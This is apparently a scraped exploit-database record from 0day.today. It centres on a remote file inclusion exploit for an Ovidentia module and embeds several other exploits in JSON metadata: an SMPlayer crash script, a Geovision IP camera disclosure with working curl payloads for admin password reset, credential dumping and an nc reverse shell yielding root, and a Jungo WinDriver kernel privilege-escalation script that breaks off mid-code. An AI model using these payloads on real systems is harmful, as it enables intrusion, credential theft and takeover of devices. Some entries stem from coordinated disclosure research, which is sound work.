ID 1337DAY-ID-25000 Type zdt Reporter bd0rk Modified 2016-04-12T00:00:00
Description
Exploit for php platform in category web applications
# Title: Ovidentia Module troubletickets 7.6 GLOBALS[babInstallPath] Remote File Inclusion Vulnerability
# Author: bd0rk || SCHOOL-OF-HACK.NET
# eMail: bd0rk[at]hackermail.com
# Website: http://www.school-of-hack.net
# Download: http://www.ovidentia.org/index.php?tg=fileman&sAction=getFile&id=17&gr=Y&path=Downloads%2FAdd-ons%2FModules%2Ftroubletickets&file=troubletickets-7-6.zip&idf=838
Proof-of-Concept:
Vuln.-Code in /troubletickets-7-6/programs/statistique_evolution.php line 16
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
require_once $GLOBALS['babInstallPath'].'utilit/dateTime.php';
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+]Usage: http://[someone]/troubletickets-7-6/programs/statistique_evolution.php?GLOBALS[babInstallPath]=[SHELLCODE]
The problem: The GLOBALS[babInstallPath]-parameter isn't declared before require_once.
So an attacker can inject some php-shellcode (c99 or r57 for example) 'bout it.
It's no problem to patch it!
Declare this parameter or use an alert!
Greetings from bd0rk. HackThePlanet!
# 0day.today [2018-03-19] #
{"published": "2016-04-12T00:00:00", "id": "1337DAY-ID-25000", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [{"differentElements": ["description", "published", "reporter", "modified", "sourceHref", "sourceData", "title", "href"], "edition": 1, "lastseen": "2016-04-19T04:09:51", "bulletin": {"published": "2016-02-25T00:00:00", "id": "1337DAY-ID-25000", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [], "enchantments": {"score": {"value": 4.6, "modified": "2016-04-19T04:09:51"}}, "hash": "2e383df99cd1c3b9c84f0fba2e099328e8f39e33ecbb646cfa526674ba2b7b53", "description": "A remote command execution vulnerability exists in Elastix PBX version 2.2.0 and earlier when using unpatched versions of FreePBX 2.5, 2.6, 2.7, 2.8, 2.9, and 2.10. This vulnerability in Elastix 2.2.0 and earlier allows for remote command execution in Elastix. Once it completes you may type \"nmap --interactive\" and \"!sh\" to escalate your privileges to root on most systems.\n\nThis is private exploit. You can buy it at http://0day.today", "type": "zdt", "lastseen": "2016-04-19T04:09:51", "edition": 1, "title": "Elastix PBX 2.2.0 Remote Command Execution with Local Privilege Escalation Exploit", "href": "http://0day.today/exploit/description/25000", "modified": "2016-02-25T00:00:00", "bulletinFamily": "exploit", "viewCount": 12, "cvelist": [], "sourceHref": "", "references": [], "reporter": "0day Today Team", "sourceData": "", "hashmap": [{"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "sourceData"}, {"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "51fdf70b2265dec218616a77dd0e679a", "key": "href"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "fedb8f1af32e10bfd154845e1054c2ee", "key": "title"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "sourceHref"}, {"hash": "7bf59d5e58470604ab6f178f1d0a5c27", "key": "description"}, {"hash": "86fafcde2f8b00145efced7b975ee959", "key": "reporter"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "a402e8dffe8ee0ba4a366d75dbe8fad6", "key": "published"}, {"hash": "a402e8dffe8ee0ba4a366d75dbe8fad6", "key": "modified"}], "objectVersion": "1.0"}}], "description": "Exploit for php platform in category web applications", "hash": "91b82ecddd9fcdcfd18ba15ce1a4e812665629f336ba2427cf339162e795fe88", "enchantments": {"score": {"value": -0.3, "vector": "NONE", "modified": "2018-03-19T05:23:25"}, "dependencies": {"references": [{"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:9FD54B8253FD0053BA014F80A7261833"]}, {"type": "zdt", "idList": ["1337DAY-ID-29725", "1337DAY-ID-28439", "1337DAY-ID-25438", "1337DAY-ID-24947", "1337DAY-ID-24935", "1337DAY-ID-25723", "1337DAY-ID-20700", "1337DAY-ID-20597"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:144046", "PACKETSTORM:137942", "PACKETSTORM:121045"]}, {"type": "exploitdb", "idList": ["EDB-ID:42624", "EDB-ID:40113", "EDB-ID:24935", "EDB-ID:24947"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/HTTP/NOVELL_MDM_LFI", "MSF:EXPLOIT/LINUX/UPNP/MINIUPNPD_SOAP_BOF", "MSF:EXPLOIT/LINUX/MISC/MONGOD_NATIVE_HELPER"]}], "modified": "2018-03-19T05:23:25"}, "vulnersScore": -0.3}, "type": "zdt", "lastseen": "2018-03-19T05:23:25", "edition": 2, "title": "Ovidentia troubleticketsModule 7.6 - Remote File Inclusion", "href": "https://0day.today/exploit/description/25000", "modified": "2016-04-12T00:00:00", "bulletinFamily": "exploit", "viewCount": 19, "cvelist": [], "sourceHref": "https://0day.today/exploit/25000", "references": [], "reporter": "bd0rk", "sourceData": "# Title: Ovidentia Module troubletickets 7.6 GLOBALS[babInstallPath] Remote File Inclusion Vulnerability\r\n# Author: bd0rk || SCHOOL-OF-HACK.NET\r\n# eMail: bd0rk[at]hackermail.com\r\n# Website: http://www.school-of-hack.net\r\n# Download: http://www.ovidentia.org/index.php?tg=fileman&sAction=getFile&id=17&gr=Y&path=Downloads%2FAdd-ons%2FModules%2Ftroubletickets&file=troubletickets-7-6.zip&idf=838\r\n \r\nProof-of-Concept:\r\n \r\nVuln.-Code in /troubletickets-7-6/programs/statistique_evolution.php line 16\r\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n \r\nrequire_once $GLOBALS['babInstallPath'].'utilit/dateTime.php';\r\n \r\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n \r\n[+]Usage: http://[someone]/troubletickets-7-6/programs/statistique_evolution.php?GLOBALS[babInstallPath]=[SHELLCODE]\r\n \r\nThe problem: The GLOBALS[babInstallPath]-parameter isn't declared before require_once.\r\n So an attacker can inject some php-shellcode (c99 or r57 for example) 'bout it.\r\n It's no problem to patch it!\r\n Declare this parameter or use an alert!\r\n \r\n \r\nGreetings from bd0rk. HackThePlanet!\n\n# 0day.today [2018-03-19] #", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "8a1b9d67edd161eba6df1d6d4a1ba4bc", "key": "description"}, {"hash": "5aa9637956cdcdfebff7b414e2d49d94", "key": "href"}, {"hash": "9aa94e028f9943096f22029df1d1332e", "key": "modified"}, {"hash": "9aa94e028f9943096f22029df1d1332e", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "30894eb60ec9170479037f799f3e38ce", "key": "reporter"}, {"hash": "997a60b608c0714ed79c69134df53273", "key": "sourceData"}, {"hash": "27ceadde9f7d51bd3c80e3a09c18ed35", "key": "sourceHref"}, {"hash": "30f79b5d6cdf0eb8ee49bce54a1b51c5", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "objectVersion": "1.3"}
{"zdt": [{"lastseen": "2019-12-04T14:21:37", "bulletinFamily": "exploit", "description": "Exploit for windows platform in category dos / poc", "modified": "2019-11-24T00:00:00", "published": "2019-11-24T00:00:00", "id": "1337DAY-ID-33585", "href": "https://0day.today/exploit/description/33585", "title": "SMPlayer 19.5.0 - Denial of Service Exploit", "type": "zdt", "sourceData": "# Title : SMPlayer 19.5.0 - Denial of Service (PoC)\r\n# Tested on : Windows 7 (64 bit)\r\n# Vulnerable Software: SMPlayer v 19.5.0\r\n# Exploit Author: Malav Vyas\r\n# Vendor Homepage: https://smplayer.info\r\n# Version : 19.5.0\r\n# Software Link : https://smplayer.info/en/downloads\r\n\r\n# POC\r\n# run this python file, which will generate attack.m3u file\r\n# .m3u file is used as a playlist\r\n# this python file will generate a .m3u file with 25000 \"A\" characters.\r\n# Open this file in SMPlayer two times.\r\n# second time, buffer would be successfully overflowed and it would result in a Denial Of Service attack.\r\n# For more details, please refer to video\r\n\r\nf=\"attack.m3u\"\r\n\r\nbof = \"A\"*25000\r\n\r\nwriteFile = open(f, \"w\")\r\nwriteFile.write(bof)\r\nwriteFile.close()\r\n\n\n# 0day.today [2019-12-04] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/33585"}, {"lastseen": "2018-03-19T21:12:59", "bulletinFamily": "exploit", "description": "Exploit for hardware platform in category remote exploits", "modified": "2018-02-07T00:00:00", "published": "2018-02-07T00:00:00", "href": "https://0day.today/exploit/description/29725", "id": "1337DAY-ID-29725", "title": "Geovision Inc. IP Camera/Video/Access Control - Multiple Remote Command Execution / Stack Overflow /", "type": "zdt", "sourceData": "[STX]\r\n \r\nSubject: Geovision Inc. IP Camera/Video/Access Control Multiple Remote Command Execution - Multiple Stack Overflow - Double free - Unauthorized Access\r\n \r\nAttack vector: Remote\r\nAuthentication: Anonymous (no credentials needed)\r\nResearcher: bashis <mcw noemail eu> (November 2017)\r\nPoC: https://github.com/mcw0/PoC\r\nPython PoC: https://github.com/mcw0/PoC/blob/master/Geovision-PoC.py\r\nRelease date: February 1, 2018\r\nFull Disclosure: 90 days\r\n \r\nVendor URL: http://www.geovision.com.tw/\r\nUpdated FW: http://www.geovision.com.tw/download/product/\r\n \r\nheap: Executable + Non-ASLR\r\nstack: Executable + ASLR\r\n \r\nVulnerable:\r\nPractically more or less all models and versions with FW before November/December 2017 of Geovision embedded IP devices suffer from one or more of these vulnerabilities.\r\n \r\nVerified:\r\nGV-BX1500 v3.10 2016-12-02\r\nGV-MFD1501 v3.12 2017-06-19\r\n \r\nTimeline:\r\nNovember 5, 2017: Initiated contact with Geovision\r\nNovember 6, 2017: Response from Geovision\r\nNovember 8, 2017: Informed Geovision about quite dangerous bug in 'FilterSetting.cgi'\r\nNovember 8, 2017: Responce from Geovision\r\nNovember 15, 2017: Reached out to Geovision to offer more time until FD\r\n (due to the easy exploiting and number of vulnerabilities in large number of products)\r\nNovember 17, 2017: Request from Geovision to have time to end of January 2018\r\nNovember 18, 2017: Agreed to FD date of February 1, 2018\r\nNovember 20, 2017: Received one image for test purposes\r\nNovember 26, 2017: ACK to Geovision that image looks good\r\nJanuary 16, 2018: Sent this FD and PoC Python to Geovision for comments before FD, if any objections.\r\nJanuary 17, 2018: Received all OK from Geovision, no objections, toghether with thanks for the effort for trying to make Geovision products more safe.\r\nJanuary 17, 2018: Thanked Geoviosion for good cooperation.\r\nFebruary 1, 2018: Full disclosure\r\n \r\n \r\n-[Unathorized Access]-\r\n \r\n1)\r\nPoC: Reset and change 'admin' to 'root' with passwd 'PWN' (GV-MFD1501 v3.12 2017-06-19)\r\ncurl -v http://192.168.57.20:80/UserCreat.cgi?admin_username=root\\&admin_passwordNew=PWN\r\n \r\n2)\r\nPoC: Change device WebGUI language back to default\r\ncurl -v -X POST http://192.168.57.20:80/LangSetting.cgi -d lang_type=0\\&submit=Apply\r\n \r\n3)\r\nUnathorized upgrade of firmware.\r\nPoC: Reboot the remote device as in 'run_upgrade_prepare'\r\ncurl -v \"http://192.168.57.20:80/geo-cgi/sdk_fw_update.cgi\"\r\nURI: http://192.168.57.20/ssi.cgi/FirmwareUpdate.htm\r\n \r\n4)\r\nPoC: Upload of Firmware header for checking correct firmware.\r\ncurl -v -X PUT \"http://192.168.57.20:80/geo-cgi/sdk_fw_check.cgi\" -d \"BAAAALAAAAABAgAAAAAAADKvfBIAAAABGDIpBwAAAABhc19jcmZpZAAAAAAAAAAALgYAALAAAADXe///AAAAAAAAAABib290bG9hZGVyLmJpbgAAAAA0ALAAAgBOAP//AAAAAAAAAAB1SW1hZ2UAAAAAAAAAAAAA1OIaALAANgDSw///AAAAAAAAAAByYW1kaXNrLmd6AAAAAAAAALBtArAAUgAIuf//AAAAAAAAAAAjIFN0YXJpbmcgd2l0aCAnSElEOicgYW5kIHNwbGl0IGJ5ICcsJyBhbmQgZW5kIHdpdGggJ1xyXG4nICgweDBkIDB4MGEpDQpISUQ6MTE3MCxOYW1lOkdWLUxQQzIyMTAsRG93blZlcjoxMDINCkhJRDoxMTUwLE5hbWU6R1YtUFBUWjczMDBfU0QsRG93blZlcjozMDUNCkhJRDoxMTUyLE5hbWU6R1YtUFBUWjczMDBfRkUsRG93blZlcjozMDUNCkhJRDoxMTc2LE5hbWU6R1YtQlgzNDAwRSxEb3duVmVyOjMwMw0KSElEOjExNzUsTmFtZTpHVi1CWDE1MDBFLERvd25WZXI6MzAzDQpISUQ6MTEwMSxOYW1lOkdWLVVORkUyNTAzLERvd25WZXI6MzA2DQpISUQ6MTE0NSxOYW1lOkdWLVVOMjYwMCxEb3c=\"\r\n \r\n/var/log/messages\r\n192.168.57.1 - - [01/Jan/1970:00:32:43 +0000] \"PUT /geo-cgi/sdk_fw_check.cgi HTTP/1.1\" 200 25000 \"\" \"curl/7.38.0\"\r\nNov 5 17:11:51 thttpd[1576]: (1576) cgi[3734]: Spawned CGI process 1802 to run 'geo-cgi/sdk_fw_check.cgi', query[]\r\nNov 5 17:11:51 sdk_fw_check.cgi: CONTENT_LENGTH = 684\r\nNov 5 17:11:51 sdk_fw_check.cgi: (1802) main[183]: base64 encode length : 684\r\nNov 5 17:11:51 sdk_fw_check.cgi: (1802) main[184]: base64 encode output : BAAAALAAAAABAgAAAAAAADKvfBIAAAABGDIpBwAAAABhc19jcmZpZAAAAAAAAAAALgYAALAAAADXe///AAAAAAAAAABib290bG9hZGVyLmJpbgAAAAA0ALAAAgBOAP//AAAAAAAAAAB1SW1hZ2UAAAAAAAAAAAAA1OIaALAANgDSw///AAAAAAAAAAByYW1kaXNrLmd6AAAAAAAAALBtArAAUgAIuf//AAAAAAAAAAAjIFN0YXJpbmcgd2l0aCAnSElEOicgYW5kIHNwbGl0IGJ5ICcsJyBhbmQgZW5kIHdpdGggJ1xyXG4nICgweDBkIDB4MGEpDQpISUQ6MTE3MCxOYW1lOkdWLUxQQzIyMTAsRG93blZlcjoxMDINCkhJRDoxMTUwLE5hbWU6R1YtUFBUWjczMDBfU0QsRG93blZlcjozMDUNCkhJRDoxMTUyLE5hbWU6R1YtUFBUWjczMDBfRkUsRG93blZlcjoz\r\nNov 5 17:11:51 sdk_fw_check.cgi: (1802) main[185]: decode length : 512\r\nNov 5 17:11:51 sdk_fw_check.cgi: (1802) main[186]: decode output : ^D\r\nNov 5 17:11:51 sdk_fw_check.cgi: (1802) check_image_format_is_OK[839]: (1) Product Error: Image's magic[513] != DEV_MAGIC[1000]\r\nNov 5 17:11:51 sdk_fw_check.cgi: (1802) check_firmware[135]: ERROR : check firmware, length [512]\r\n \r\n5)\r\nUnathorized access of 'sdk_config_set.cgi' to Import Setting (SDK_CONFIG_SET) \r\ncurl -v -X PUT \"http://192.168.57.20:80/geo-cgi/sdk_config_set.cgi\"\r\n \r\n6)\r\n/PSIA/\r\nAccess to GET (read) and PUT (write)\r\ncurl -v -X PUT http://192.168.57.20:80/PSIA/System/reboot\r\ncurl -v -X PUT http://192.168.57.20:80/PSIA/System/updateFirmware\r\ncurl -v -X PUT http://192.168.57.20:80/PSIA/System/factoryReset\r\n[...]\r\nList: /PSIA/System/reboot/index\r\nUsage: /PSIA/System/reboot/description\r\nPoC: curl -v -X PUT http://192.168.57.20:80/PSIA/System/reboot\r\nFull recursive list: /PSIA/indexr\r\n \r\n \r\n-[Remote Command Execution]-\r\n \r\n7)\r\nPoC will create 'tmp/Login.cgi' with '<!--#include file=\"SYS_CFG\"-->', then Dump All Settings,\r\nincluding login and passwords in clear text by accessing the created Login.htm\r\n \r\ncurl -v \"http://192.168.57.20:80/PictureCatch.cgi?username=GEOVISION&password=%3becho%20%22%3c%21--%23include%20file=%22SYS_CFG%22--%3e%22%3etmp/Login.htm%3b&data_type=1&attachment=1&channel=1&secret=1&key=PWNED\" ; curl -v \"http://192.168.57.20:80/ssi.cgi/tmp/Login.htm\"\r\n \r\n< HTTP/1.1 200 OK\r\n...\r\n-------------------------------------\r\n- -\r\n- Dump All Settings -\r\n- -\r\n-------------------------------------\r\n...\r\n \r\n \r\n8)\r\nPoC will pop reverse connect back shell to 192.168.57.1\r\n \r\n/www/PictureCatch.cgi\r\ncurl -v \"http://192.168.57.20:80/PictureCatch.cgi?username=GEOVISION\\&password=%3bmkfifo%20/tmp/s0%3bnc%20-w%205%20192.168.57.1%201337</tmp/s0|/bin/sh>/tmp/s0%202>/tmp/s0%3brm%20/tmp/s0%3b\\&data_type=1\\&attachment=1\\&channel=1\\&secret=1\\&key=PWNED\"\r\n \r\n$ ncat -vlp 1337\r\nNcat: Version 7.12 ( https://nmap.org/ncat )\r\nNcat: Listening on :::1337\r\nNcat: Listening on 0.0.0.0:1337\r\nNcat: Connection from 192.168.57.20.\r\nNcat: Connection from 192.168.57.20:55331.\r\npwd\r\n/www\r\nid\r\nuid=0(root) gid=0(root)\r\nexit\r\n$\r\n \r\n9)\r\n/www/JpegStream.cgi\r\ncurl -v \"http://192.168.57.20:80/JpegStream.cgi?username=GEOVISION\\&password=%3bmkfifo%20/tmp/s0%3bnc%20-w%205%20192.168.57.1%201337</tmp/s0|/bin/sh>/tmp/s0%202>/tmp/s0%3brm%20/tmp/s0%3b\\&data_type=1\\&attachment=1\\&channel=1\\&secret=1\\&key=PWNED\"\r\n \r\n$ ncat -vlp 1337\r\nNcat: Version 7.12 ( https://nmap.org/ncat )\r\nNcat: Listening on :::1337\r\nNcat: Listening on 0.0.0.0:1337\r\nNcat: Connection from 192.168.57.20.\r\nNcat: Connection from 192.168.57.20:55332.\r\npwd\r\n/www\r\nid\r\nuid=0(root) gid=0(root)\r\nexit\r\n$\r\n \r\nProblem(s):\r\nSIiUTIL_GetDecryptData calling popen() \"sh -c /var/www/testbf d PWNED ;mkfifo /tmp/s0;...\" without proper sanitation of user input\r\n \r\nNote: \r\nVulnerable tags: 'username', 'password' and 'key'\r\n \r\n \r\n-[Double free]-\r\n \r\n10)\r\ncurl -v http://192.168.57.20:80/PSIA/System/configurationData\r\n*** glibc detected *** psia.cgi: double free or corruption (out): 0x00077d10 ***\r\n \r\n-[Stack Overflow]-\r\n \r\n11)\r\n/usr/local/thttpd\r\ncurl -v \"http://192.168.57.20:80/htpasswd?password=`for((i=0;i<140;i++));do echo -en \"X\";done`AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIII\"\r\n \r\nProgram received signal SIGSEGV, Segmentation fault.\r\n0x49494948 in ?? ()\r\n(gdb) bt\r\n#0 0x49494948 in ?? ()\r\n#1 0x0003889c in ?? ()\r\nBacktrace stopped: previous frame identical to this frame (corrupt stack?)\r\n(gdb) i reg\r\nr0 0x0 0\r\nr1 0x369650 3577424\r\nr2 0x1 1\r\nr3 0x68 104\r\nr4 0x41414141 1094795585\r\nr5 0x42424242 1111638594\r\nr6 0x43434343 1128481603\r\nr7 0x44444444 1145324612\r\nr8 0x45454545 1162167621\r\nr9 0x46464646 1179010630\r\nr10 0x47474747 1195853639\r\nr11 0x48484848 1212696648\r\nr12 0x3680e8 3571944\r\nsp 0x7ee0fbc8 0x7ee0fbc8\r\nlr 0x3889c 231580\r\npc 0x49494948 0x49494948\r\ncpsr 0x20000030 536870960\r\n(gdb)\r\n \r\n12)\r\n/usr/local/thttpd\r\ncurl -v http://192.168.57.20:80/geo-cgi/param.cgi?skey=`for((i=0;i<44;i++)); do echo -en \"X\"; done`AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNN\r\n \r\nProgram received signal SIGSEGV, Segmentation fault.\r\n0x49494948 in ?? ()\r\n(gdb) bt\r\n#0 0x49494948 in ?? ()\r\n#1 0x3e4c4d54 in ?? ()\r\nBacktrace stopped: previous frame identical to this frame (corrupt stack?)\r\n(gdb) i reg\r\nr0 0xffffffff 4294967295\r\nr1 0x7e963e8c 2123775628\r\nr2 0x0 0\r\nr3 0x242 578\r\nr4 0x41414141 1094795585\r\nr5 0x42424242 1111638594\r\nr6 0x43434343 1128481603\r\nr7 0x44444444 1145324612\r\nr8 0x45454545 1162167621\r\nr9 0x46464646 1179010630\r\nr10 0x47474747 1195853639\r\nr11 0x48484848 1212696648\r\nr12 0xa 10\r\nsp 0x7e983c48 0x7e983c48\r\nlr 0x3e4c4d54 1045187924\r\npc 0x49494948 0x49494948\r\ncpsr 0x60000030 1610612784\r\n(gdb)\r\n \r\n13)\r\n/www/PictureCatch.cgi\r\ncurl -v \"http://192.168.57.20:80/PictureCatch.cgi?username=`for((i=0;i<324;i++));do echo -en \"A\";done`BBBB&password=GEOVISION&data_type=1&attachment=1&channel=1&secret=1&key=PWNED\"\r\n \r\n[pid 2215] --- SIGSEGV {si_signo=SIGSEGV, si_code=SEGV_MAPERR, si_addr=0x42424242} ---\r\n \r\n14)\r\n/www/Login3gpp.cgi\r\ncurl -v \"http://192.168.57.20:80/Login3gpp.cgi?username=`for((i=0;i<444;i++));do echo -en \"A\";done`BBBB&password=PWNED\"\r\n \r\n[pid 2161] --- SIGSEGV {si_signo=SIGSEGV, si_code=SEGV_MAPERR, si_addr=0x42424243} ---\r\n \r\n15)\r\n/www/Login.cgi\r\ncurl -v \"http://192.168.57.20:80/Login.cgi?username=`for((i=0;i<477;i++));do echo -en \"A\";done`BBBB&password=PWNED\"\r\n \r\n[pid 2135] --- SIGSEGV {si_signo=SIGSEGV, si_code=SEGV_MAPERR, si_addr=0x42424242} ---\r\n \r\nNote: username and password uses strcpy() and both are vulnerable.\r\nHowever, 'password' cannot be used remotely since 'thttpd' checking for this, and is vulnerable for stack overflow.\r\n \r\nHave a nice day\r\n/bashis\r\n \r\n[ETX]\n\n# 0day.today [2018-03-19] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/29725"}, {"lastseen": "2018-01-10T03:12:13", "bulletinFamily": "exploit", "description": "Exploit for windows platform in category local exploits", "modified": "2017-09-06T00:00:00", "published": "2017-09-06T00:00:00", "href": "https://0day.today/exploit/description/28439", "id": "1337DAY-ID-28439", "type": "zdt", "title": "Jungo DriverWizard WinDriver - Kernel Pool Overflow Exploit", "sourceData": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nJungo DriverWizard WinDriver Kernel Pool Overflow Vulnerability\r\n\r\nDownload: http://www.jungo.com/st/products/windriver/\r\nFile: WD1240.EXE\r\nSha1: 3527cc974ec885166f0d96f6aedc8e542bb66cba\r\nDriver: windrvr1240.sys\r\nSha1: 0f212075d86ef7e859c1941f8e5b9e7a6f2558ad\r\nCVE: CVE-2017-14153\r\nAuthor: Steven Seeley (mr_me) of Source Incite\r\nAffected: <= v12.4.0\r\nThanks: b33f, ryujin and sickness\r\nAnalysis: http://srcincite.io/blog/2017/09/06/sharks-in-the-pool-mixed-object-exploitation-in-the-windows-kernel-pool.html\r\n\r\nSummary:\r\n========\r\n\r\nThis vulnerability allows local attackers to escalate privileges on vulnerable installations of Jungo WinDriver. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.\r\n\r\nThe specific flaw exists within the processing of IOCTL 0x953824b7 by the windrvr1240 kernel driver. The issue lies in the failure to properly validate user-supplied data which can result in a kernel pool overflow. An attacker can leverage this vulnerability to execute arbitrary code under the context of kernel.\r\n\r\nTimeline:\r\n=========\r\n\r\n2017-08-22 \u2013 Verified and sent to Jungo via <a href=\"/cdn-cgi/l/email-protection\" class=\"__cf_email__\" data-cfemail=\"4c3f2d20293f0c\">[email protected]</a>/<a href=\"/cdn-cgi/l/email-protection\" class=\"__cf_email__\" data-cfemail=\"1e78776c6d6a5e\">[email protected]</a>/<a href=\"/cdn-cgi/l/email-protection\" class=\"__cf_email__\" data-cfemail=\"41322422343328353801\">[email protected]</a>/<a href=\"/cdn-cgi/l/email-protection\" class=\"__cf_email__\" data-cfemail=\"234a4d454c6349564d444c0d404c4e\">[email protected]</a>\r\n2017-08-25 \u2013 No response from Jungo and two bounced emails\r\n2017-08-26 \u2013 Attempted a follow up with the vendor via website chat\r\n2017-08-26 \u2013 No response via the website chat\r\n2017-09-03 \u2013 Recieved an email from a Jungo representative stating that they are \"looking into it\"\r\n2017-09-03 \u2013 Requested a timeframe for patch development and warned of possible 0day release\r\n2017-09-06 \u2013 No response from Jungo\r\n2017-09-06 \u2013 Public 0day release of advisory\r\n\r\nExample:\r\n========\r\n\r\nC:\\Users\\Guest\\Desktop>icacls poc.py\r\npoc.py NT AUTHORITY\\Authenticated Users:(I)(F)\r\nNT AUTHORITY\\SYSTEM:(I)(F)\r\nBUILTIN\\Administrators:(I)(F)\r\nBUILTIN\\Users:(I)(F)\r\nMandatory Label\\Low Mandatory Level:(I)(NW)\r\n\r\nSuccessfully processed 1 files; Failed processing 0 files\r\n\r\nC:\\Users\\Guest\\Desktop>whoami\r\ndebugee\\guest\r\n\r\nC:\\Users\\Guest\\Desktop>poc.py\r\n\r\n--[ Jungo DriverWizard WinDriver Kernel Pool Overflow EoP exploit ]\r\nSteven Seeley (mr_me) of Source Incite\r\n\r\n(+) spraying pool with mixed objects...\r\n(+) sprayed the pool!\r\n(+) making pool holes...\r\n(+) made the pool holes!\r\n(+) allocating shellcode...\r\n(+) allocated the shellcode!\r\n(+) triggering pool overflow...\r\n(+) allocating pool overflow input buffer\r\n(+) elevating privileges!\r\nMicrosoft Windows [Version 6.1.7601]\r\nCopyright (c) 2009 Microsoft Corporation. All rights reserved.\r\n\r\nC:\\Users\\Guest\\Desktop>whoami\r\nnt authority\\system\r\n\r\nC:\\Users\\Guest\\Desktop>\r\n\"\"\"\r\nfrom ctypes import *\r\nfrom ctypes.wintypes import *\r\nimport struct, sys, os, time\r\nfrom platform import release, architecture\r\n\r\nntdll = windll.ntdll\r\nkernel32 = windll.kernel32\r\nMEM_COMMIT = 0x00001000\r\nMEM_RESERVE = 0x00002000\r\nPAGE_EXECUTE_READWRITE = 0x00000040\r\nSTATUS_SUCCESS = 0x0\r\nSTATUS_INFO_LENGTH_MISMATCH = 0xC0000004\r\nSTATUS_INVALID_HANDLE = 0xC0000008\r\nSystemExtendedHandleInformation = 64\r\n\r\nclass LSA_UNICODE_STRING(Structure):\r\n\"\"\"Represent the LSA_UNICODE_STRING on ntdll.\"\"\"\r\n_fields_ = [\r\n(\"Length\", USHORT),\r\n(\"MaximumLength\", USHORT),\r\n(\"Buffer\", LPWSTR),\r\n]\r\n\r\nclass SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX(Structure):\r\n\"\"\"Represent the SYSTEM_HANDLE_TABLE_ENTRY_INFO on ntdll.\"\"\"\r\n_fields_ = [\r\n(\"Object\", c_void_p),\r\n(\"UniqueProcessId\", ULONG),\r\n(\"HandleValue\", ULONG),\r\n(\"GrantedAccess\", ULONG),\r\n(\"CreatorBackTraceIndex\", USHORT),\r\n(\"ObjectTypeIndex\", USHORT),\r\n(\"HandleAttributes\", ULONG),\r\n(\"Reserved\", ULONG),\r\n]\r\n\r\nclass SYSTEM_HANDLE_INFORMATION_EX(Structure):\r\n\"\"\"Represent the SYSTEM_HANDLE_INFORMATION on ntdll.\"\"\"\r\n_fields_ = [\r\n(\"NumberOfHandles\", ULONG),\r\n(\"Reserved\", ULONG),\r\n(\"Handles\", SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX * 1),\r\n]\r\n\r\nclass PUBLIC_OBJECT_TYPE_INFORMATION(Structure):\r\n\"\"\"Represent the PUBLIC_OBJECT_TYPE_INFORMATION on ntdll.\"\"\"\r\n_fields_ = [\r\n(\"Name\", LSA_UNICODE_STRING),\r\n(\"Reserved\", ULONG * 22),\r\n]\r\n\r\nclass PROCESSENTRY32(Structure):\r\n_fields_ = [\r\n(\"dwSize\", c_ulong),\r\n(\"cntUsage\", c_ulong),\r\n(\"th32ProcessID\", c_ulong),\r\n(\"th32DefaultHeapID\", c_int),\r\n(\"th32ModuleID\", c_ulong),\r\n(\"cntThreads\", c_ulong),\r\n(\"th32ParentProcessID\", c_ulong),\r\n(\"pcPriClassBase\", c_long),\r\n(\"dwFlags\", c_ulong),\r\n(\"szExeFile\", c_wchar * MAX_PATH)\r\n]\r\n\r\nProcess32First = kernel32.Process32FirstW\r\nProcess32Next = kernel32.Process32NextW\r\n\r\ndef signed_to_unsigned(signed):\r\n\"\"\"\r\nConvert signed to unsigned integer.\r\n\"\"\"\r\nunsigned, = struct.unpack (\"L\", struct.pack (\"l\", signed))\r\nreturn unsigned\r\n\r\ndef get_type_info(handle):\r\n\"\"\"\r\nGet the handle type information to find our sprayed objects.\r\n\"\"\"\r\npublic_object_type_information = PUBLIC_OBJECT_TYPE_INFORMATION()\r\nsize = DWORD(sizeof(public_object_type_information))\r\nwhile True:\r\nresult = signed_to_unsigned(\r\nntdll.NtQueryObject(\r\nhandle, 2, byref(public_object_type_information), size, None))\r\nif result == STATUS_SUCCESS:\r\nreturn public_object_type_information.Name.Buffer\r\nelif result == STATUS_INFO_LENGTH_MISMATCH:\r\nsize = DWORD(size.value * 4)\r\nresize(public_object_type_information, size.value)\r\nelif result == STATUS_INVALID_HANDLE:\r\nreturn None\r\nelse:\r\nraise x_file_handles(\"NtQueryObject.2\", hex 